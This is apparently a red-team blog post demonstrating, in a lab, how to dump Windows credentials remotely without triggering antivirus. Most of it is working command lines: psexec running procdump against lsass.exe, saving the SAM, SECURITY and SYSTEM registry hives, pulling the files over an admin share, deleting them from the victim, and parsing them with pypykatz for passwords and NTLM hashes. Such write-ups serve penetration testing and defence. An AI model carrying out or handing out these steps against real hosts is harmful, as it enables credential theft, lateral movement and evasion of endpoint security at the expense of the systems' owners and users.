Evading Antivirus When Dumping Passwords Remotely

During Red Team engagements, I frequently gain RCE (remote code execution) on a host by using credentials which I gained from a previous attack. This RCE could come in the form of psexec, SQL commands or even a full Remote Desktop session. One of my first objectives at this point is to determine if endpoint security (antivirus) software is installed on the remote victim. If it is not, I'll typically run mimikatz.

If endpoint security software is installed, it's generally still a trivial task to harvest credentials by dumping lsass.exe and the SAM. This sort of dump is often not blocked by antivirus (I tested multiple). My post focuses on how to perform the dumps with psexec and how to parse the output with pypykatz. I will demonstrate this in a lab environment, using psexec to authenticate to the victim to dump remotely.

 

Test environment

This attack could be done with only one attack machine, but I used two attack VMs:

1. Windows 10 - Uses psexec to perform the dumps remotely

2. Kali Linux 2020.3 - Runs pypykatz to parse the files for credentials

The victim VM was running Windows 10.

The Attack

After downloading procdump and psexec on the Windows attack box, I performed the remote lsass.exe dump against the remote victim:

psexec \\192.168.0.100 -u testuser -p password123 -e -h -s -c procdump -accepteula -ma lsass.exe c:\lsass.dmp
 

Note that by using the -c option, I copied procdump to the remote victim to make things simpler. We now have enough to get credentials in RAM, but I want to get the SAM as well:

psexec \\192.168.0.100 -u testuser -p password123 -e -h -s cmd /c reg save hklm\system c:\sys.hiv ^& reg save hklm\security c:\sec.hiv ^& reg save hklm\sam c:\sam.hiv


Notice the ^ to escape the &. Now it's time to download the l00t:

net use x: /user:testuser \\192.168.0.100\c$ password123
copy x:\lsass.dmp
copy x:\*.hiv
del x:\lsass.dmp x:\sam.hiv x:\sec.hiv x:\sys.hiv

This completes the active portion of the attack, and the rest involves parsing the resulting files.

Parsing

I decided to use my Kali box to parse the files because pypykatz comes built in. I used VMWare's shared folder feature to move the files from the Windows VM guest to the host. I hadn't setup the VMWare shared folder on my Kali machine yet, so I used these steps to do that:

1. mkdir /mnt/hgfs

2. Add this to /etc/fstab:

vmhgfs-fuse    /mnt/hgfs    fuse    defaults,allow_other    0    0

3. mount -a

4. cd /mnt/hgfs 

Next, I used pypykatz to parse the files:

5. pypykatz lsa minidump lsass.dmp
6. pypykatz registry --sam sam.hiv --security sec.hiv sys.hiv

Depending on various factors, you may end up harvesting cleartext passwords (as shown in the first screenshot above), or NTLM password hashes.

 

If you prefer to use mimikatz for this parsing, the commands can be found here: https://www.vanimpe.eu/2019/03/07/mimikatz-and-hashcat-in-practice/